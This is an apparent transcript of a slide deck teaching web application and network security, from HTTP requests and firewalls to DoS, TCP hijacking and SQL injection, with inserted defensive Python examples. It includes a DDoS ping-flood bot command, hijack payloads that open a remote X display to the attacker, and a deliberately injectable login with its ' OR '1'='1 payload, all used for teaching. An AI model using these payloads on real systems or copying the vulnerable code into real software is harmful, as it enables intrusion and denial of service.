Post on 18-Nov-2014

Web Application and network security

Rishabh Mehan

Saying Hello!!
To start off with the introduction, let's go through a few basics:
• What is a Web Application?
• Where is it deployed?
• How can it be reached?

Web Application
Protocols:
• HTTP – HTTPS
• FTP – SFTP
• TCP
• SSH

Request Methods
• GET: form data is encoded in the URL
• POST: data is included in the body of the request

GET example:

GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.mysite.com/

POST example (the same parameter now travels after the blank line that ends the headers; Content-Type and Content-Length, which HTTP/1.1 requires whenever a body is sent, are added here for completeness):

POST http://www.mysite.com/kgsearch/search.php HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.mysite.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

catid=1
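To make the GET/POST distinction concrete, here is a small request parser that reads both raw requests and collects the form parameters from wherever the method puts them. This is an added example, not code from the deck; the two request strings are constructed from the slide's examples (with the header list shortened) and the function name is the example's own.

```python
"""Parse raw HTTP/1.x requests and show where form data lives:
in the URL for GET, in the body for POST.

Added example, not from the original slides. The request texts are
constructed from the slide's examples with most headers trimmed."""
from urllib.parse import parse_qs, urlsplit

GET_REQUEST = (
    "GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1\r\n"
    "Host: www.mysite.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

POST_REQUEST = (
    "POST http://www.mysite.com/kgsearch/search.php HTTP/1.1\r\n"
    "Host: www.mysite.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 7\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
    "catid=1"
)


def parse_request(raw: str) -> dict:
    """Split a raw request into request line, headers and body, then gather
    the form parameters the application would see."""
    head, _, body = raw.partition("\r\n\r\n")      # blank line ends the headers
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)

    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()   # header names are case-insensitive

    parts = urlsplit(target)
    params = parse_qs(parts.query)                 # GET: data rides in the URL
    if method == "POST":
        # Honour Content-Length so trailing bytes are never mistaken for form data
        length = int(headers.get("content-length", len(body)))
        if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
            params.update(parse_qs(body[:length]))     # POST: data rides in the body
    return {
        "method": method,
        "path": parts.path,
        "version": version,
        "headers": headers,
        "params": {k: v[0] for k, v in params.items()},
    }
```

Both requests deliver the same catid=1 to search.php, which is the security-relevant point: the server must validate a parameter identically whichever channel it arrived on, while anything placed in a GET URL also ends up in browser history, proxy logs and Referer headers.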

How Request flows
[Diagram: the Client PC (10.1.0.123) sends a Request to the Server www.mybank.com (64.58.76.230) on Port 80 and receives a Response.]

Words of Wisdom
“Every program has at least two purposes: the one for which it was written, and another for which it wasn't.”
- Alan J. Perlis

Infrastructure
[Diagram of the web application infrastructure, labelled: Browser, Network, HTTP, Wireless, Web Servers, Presentation Layer, Media Store, Content Services, Application Server, Business Logic, Web Application, Database Server, Customer Identification, Access Controls, Transaction Information, Core Business Data. Caption: Very complex architectures, multiple platforms, multiple protocols.]

Why vulnerabilities
“As an Application Developer, I can build great features and functions while meeting deadlines, but I don’t know how to develop my web application with security as a feature.”
“As a Network Security Professional, I don’t know how my company’s web applications are supposed to work, so I deploy a protective solution… but don’t know if it’s protecting what it’s supposed to.”
The Web Application Security Gap:
• Application Developers and QA Professionals don’t know security
• Security Professionals don’t know the applications

Common security attacks and their countermeasures

Attack                                       Countermeasure
Finding a way into the network               Firewalls
Exploiting software bugs, buffer overflows   Intrusion Detection Systems
Denial of Service                            Ingress filtering, IDS
TCP hijacking                                IPSec
Packet sniffing                              Encryption (SSH, SSL, HTTPS)
Social problems                              Education

Firewalls
Basic problem: many network applications and protocols have security problems that are fixed over time, and it is difficult for users to keep up with the changes and keep their hosts secure.
Solution:
• Administrators limit access to end hosts by using a firewall
• The firewall is kept up-to-date by the administrators

Firewalls
[Diagram: Internet – Firewall – DMZ (web server, email server, web proxy, etc.) – Firewall – Intranet.]

Firewalls
What does a firewall rule look like? It depends on the firewall used.
Example (ipfw): /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet
This rule drops TCP traffic from the host cracker.evil.org to the telnet port of wolf.tambov.su.
Other examples: WinXP and Mac OS X have built-in and third-party firewalls, with different graphical user interfaces and varying amounts of complexity and power.

Denial of Service
Purpose: make a network service unusable, usually by overloading the server or the network.
Many different kinds of DoS attacks:
• SYN flooding
• SMURF
• Distributed attacks

Denial of Service: SYN flooding attack
• Send SYN packets with a bogus source address. Why?
• The server responds with SYN-ACK and keeps state about the TCP half-open connection; eventually server memory is exhausted by this state.
Solution: use “SYN cookies”. In response to a SYN, create a special “cookie” for the connection and forget everything else; the forgotten information can then be recreated when the ACK comes in from a legitimate connection.
[Diagram: SYN flooding attack.]
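The SYN-cookie idea in working form: the server's initial sequence number is a keyed MAC over the connection 4-tuple and a slowly moving counter, so nothing is stored until a client proves it received the SYN-ACK. This is an added example, not code from the deck; the secret, addresses, ports and counter values are constructed, and real stacks also fold the negotiated MSS into the cookie, which is left out here.

```python
"""SYN cookies: answer a SYN with an ISN the server can recompute later,
so half-open connections cost no memory.

Added example, not from the original slides. Secret, addresses, ports and
counter values are constructed for the demo; MSS encoding is omitted."""
import hashlib
import hmac

SERVER_SECRET = b"constructed-demo-secret-rotate-at-boot"  # constructed; real stacks use a random per-boot key
COOKIE_WINDOW = 2  # a cookie stays valid for this many counter ticks (e.g. ~64 s each)


def syn_cookie(src_ip, src_port, dst_ip, dst_port, counter, secret=SERVER_SECRET):
    """Stateless ISN for an incoming SYN. The top 5 bits carry the counter so the
    verifier knows which tick to recompute; the low 27 bits are the MAC."""
    msg = f"{src_ip}:{src_port}|{dst_ip}:{dst_port}|{counter}".encode()
    mac = int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:4], "big")
    return ((counter & 0x1F) << 27) | (mac & 0x07FF_FFFF)


def verify_ack(src_ip, src_port, dst_ip, dst_port, ack_number, now_counter, secret=SERVER_SECRET):
    """Run when the final ACK arrives. A legitimate client acknowledges ISN + 1, so
    ack - 1 must equal a cookie issued within the window. Only on success does the
    server allocate real connection state."""
    candidate = (ack_number - 1) & 0xFFFF_FFFF
    for age in range(COOKIE_WINDOW + 1):
        counter = now_counter - age
        if counter < 0:
            break
        expected = syn_cookie(src_ip, src_port, dst_ip, dst_port, counter, secret)
        if hmac.compare_digest(candidate.to_bytes(4, "big"), expected.to_bytes(4, "big")):
            return True
    return False


def handshake_demo():
    """A legitimate handshake next to a forged ACK from a different source."""
    client = ("10.1.0.123", 40000)
    server = ("64.58.76.230", 80)
    tick = 100
    isn = syn_cookie(*client, *server, tick)                 # SYN in: reply SYN-ACK seq=isn, store nothing
    legit = verify_ack(*client, *server, isn + 1, tick + 1)  # real client completes the handshake
    # A flood packet with a bogus source never answers the SYN-ACK, and a forged
    # ACK for another address fails because the MAC covers the source address.
    forged = verify_ack("203.0.113.9", 40000, *server, isn + 1, tick + 1)
    return legit, forged
```

The counter window is what lets the server "recreate the forgotten information" for a slow but honest client while still expiring cookies quickly enough that a captured one cannot be replayed later.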

Denial of Service: SMURF
• The source IP address of a broadcast ping is forged
• A large number of machines respond back to the victim, overloading it
[Diagram: SMURF attack.]

Denial of Service: Distributed Denial of Service
• Same techniques as regular DoS, but on a much larger scale
• Example: Sub7Server Trojan and IRC bots. Infect a large number of machines with a “zombie” program; the zombie program logs into an IRC channel and awaits commands.
• Example: bot command !p4 207.71.92.193 results in running ping.exe 207.71.92.193 -l 65500 -n 10000, which sends 10,000 64k packets to the host (655MB!)
Read more at: http://grc.com/dos/grcdos.htm

TCP Attacks
Recall how IP works… End hosts create IP packets, and routers process them based on the destination address alone.
Problem: end hosts may lie about other fields which do not affect delivery.
• Source address: a host may trick the destination into believing that the packet is from a trusted source, especially with applications which use IP addresses as a simple authentication method.
Solution: use better authentication methods.

TCP Attacks
TCP connections have associated state: starting sequence numbers, port numbers.
Problem: what if an attacker learns these values?
• Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)
• Sequence numbers are sometimes chosen in very predictable ways

TCP Attacks
If an attacker learns the associated TCP state for the connection, then the connection can be hijacked! The attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source. Ex. instead of downloading and running a new program, you download a virus and execute it.

TCP Attacks
Say hello to Alice, Bob and Mr. Big Ears.
• Alice and Bob have an established TCP connection.
• Mr. Big Ears lies on the path between Alice and Bob on the network; he can intercept all of their packets.
• First, Mr. Big Ears must drop all of Alice’s packets, since they must not be delivered to Bob (why?).
[Diagram: Alice’s packets go into The Void.]
• Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network).
[Diagram: packet marked ISN, SRC=Alice.]
What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?
• He can just DoS Alice instead of dropping her packets
• He can just send guesses of what the ISN is until one is accepted
How do you know when the ISN is accepted? Mitnick: the payload is “add self to .rhosts”, or “xterm -display MrBigEars:0”.

TCP Attacks
Why are these types of TCP attacks so dangerous?
[Diagram: a Malicious user sits between a Web server and a Trusting web client.]

TCP Attacks
How do we prevent this? IPSec:
• Provides source authentication, so Mr. Big Ears cannot pretend to be Alice
• Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing the session key

Packet Sniffing
Recall how Ethernet works… When someone wants to send a packet to someone else, they put the bits on the wire with the destination MAC address… and remember that other hosts are listening on the wire to detect collisions. It couldn’t get any easier to figure out what data is being transmitted over the network!

Packet Sniffing: how can we protect ourselves?
• SSH, not Telnet. Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!). Now that I have told you this, please do not exploit this information; packet sniffing is, by the way, prohibited by Computing Services.
• HTTP over SSL, especially when making purchases with credit cards!
• SFTP, not FTP, unless you really don’t care about the password or data. Can also use KerbFTP (download from MyAndrew).
• IPSec: provides network-layer confidentiality

Web Application Vulnerabilities
• Platform: Known Vulnerabilities
• Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing
• Application: Application Mapping, Cookie Manipulation, Custom Application Scripting, Parameter Manipulation, Reverse Directory Traversal, Brute Force, Cookie Poisoning/Theft, Buffer Overflow, SQL Injection, Cross-site scripting

Web application vulnerabilities occur in multiple areas.

What the #@$& is happening ???
[Chart: percentage of web application vulnerabilities by class (axis 0–50%): XSS, SQL Injection, Auth, Input Validation, File Include, Info Disclosure.]

Web Application Vulnerabilities: Platform
Known vulnerabilities:
• Can be exploited immediately with a minimum amount of skill or experience (“script kiddies”)
• Most easily defendable of all web vulnerabilities
• MUST have streamlined patching procedures

Web Application Vulnerabilities: Administration
(Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing)
• Less easily corrected than known issues
• Require increased awareness
• More than just configuration: must be aware of security flaws in the actual content
• Remnant files can reveal applications and versions in use
• Backup files can reveal source code and database connection strings
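A defender's version of the "Backup Checking" and "Extension Checking" items above: a hygiene script that walks the web root and reports backup, editor and version-control remnants before a crawler finds them. This is an added example, not code from the deck; the web root it scans is a temporary directory constructed inline, and the suffix lists are common conventions rather than an exhaustive signature set.

```python
"""Hygiene check for the Administration class of issues: find files under
a web root that a server would serve as static content but that belong to
the build or editing process rather than the site.

Added example, not from the original slides. The sample web root is a
constructed temporary tree; suffix lists are illustrative conventions."""
import tempfile
from pathlib import Path

BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".save", ".swp", ".tmp", "~")
DATA_SUFFIXES = {".sql", ".inc", ".ini", ".log"}
VCS_DIRS = {".git", ".svn", ".hg"}


def find_remnants(webroot):
    """Return sorted (relative path, reason) pairs for content that should not
    be reachable under the web root."""
    root = Path(webroot)
    findings = []
    for path in root.rglob("*"):
        rel_parts = path.relative_to(root).parts
        rel = "/".join(rel_parts)
        if path.is_dir():
            if path.name in VCS_DIRS:
                findings.append((rel, "version-control metadata exposes source history"))
            continue
        if any(part in VCS_DIRS for part in rel_parts[:-1]):
            continue  # already reported through the directory itself
        if path.name.endswith(BACKUP_SUFFIXES):
            findings.append((rel, "backup/editor remnant may expose source code"))
        elif path.suffix in DATA_SUFFIXES:
            findings.append((rel, "data or config file served as static content"))
    return sorted(findings)


def build_demo_webroot():
    """Constructed sample tree: a clean site plus the kinds of leftovers the
    slide warns about (a .bak copy of a script, an editor backup, a SQL dump,
    a checked-in repository)."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    for rel in ("index.php", "search.php", "search.php.bak", "config.php~",
                "dump.sql", "css/site.css", ".git/HEAD"):
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text("placeholder content\n")
    return root


if __name__ == "__main__":
    for rel, reason in find_remnants(build_demo_webroot()):
        print(f"{rel:20s} {reason}")
```

Run as part of a deployment check, a non-empty result should fail the deploy: a search.php.bak is served verbatim by most web servers because the unknown extension bypasses the PHP handler, which is exactly how source and connection strings leak.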

Web Application Vulnerabilities: Application
Application programming:
• Common coding techniques do not necessarily include security
• Input is assumed to be valid, but not tested
• Unexamined input from a browser can inject scripts into a page for replay against later visitors
• Unhandled error messages reveal application and database structures
• Unchecked database calls can be ‘piggybacked’ with a hacker’s own database call, giving direct access to business data through a web browser
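The last three bullets side by side in code: an unchecked database call that can be piggybacked, its parameterised fix, an error path that keeps database structure out of the browser, and output escaping against replayed scripts. This is an added example, not code from the deck; it uses an in-memory SQLite table with constructed sample users, and the function names are the example's own.

```python
"""Application-layer issues from the slide, before and after.

Added example, not from the original slides. Sample users and table are
constructed; SQLite runs in memory so the block is self-contained."""
import html
import logging
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return conn


def login_vulnerable(conn, name, password):
    """'Before': input is assumed valid and pasted into the SQL text, so quotes
    inside a user-supplied value rewrite the WHERE clause."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return [row[0] for row in conn.execute(sql)]


def login_hardened(conn, name, password):
    """'After': placeholders keep data and code apart; the same input is just a
    password that matches nobody."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


def safe_query(conn, sql, params=()):
    """Unhandled errors leak table and column names. Log the detail server-side
    and hand the browser a generic message. Returns (ok, payload)."""
    try:
        return True, conn.execute(sql, params).fetchall()
    except sqlite3.Error as exc:
        logging.getLogger("app").warning("database error: %s", exc)  # stays in the server log
        return False, "The request could not be processed."


def render_greeting(name):
    """Output escaping: whatever a visitor stored earlier is shown as text,
    not executed by the next visitor's browser."""
    return f"<p>Welcome, {html.escape(name, quote=True)}</p>"
```

In the vulnerable variant the classic `' OR '1'='1` password turns the query into `... AND password = '' OR '1'='1'`, which matches every row; the hardened variant sends that text to the driver as a value, and the query matches nothing. The two are the "unchecked" and "checked" database call from the bullet, with nothing else changed.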


How to Secure Web Applications
• Incorporate security into the lifecycle: apply information security principles to all software development efforts
• Educate: issue awareness, training, etc.
Are we still secure? LOLNO
Questions?
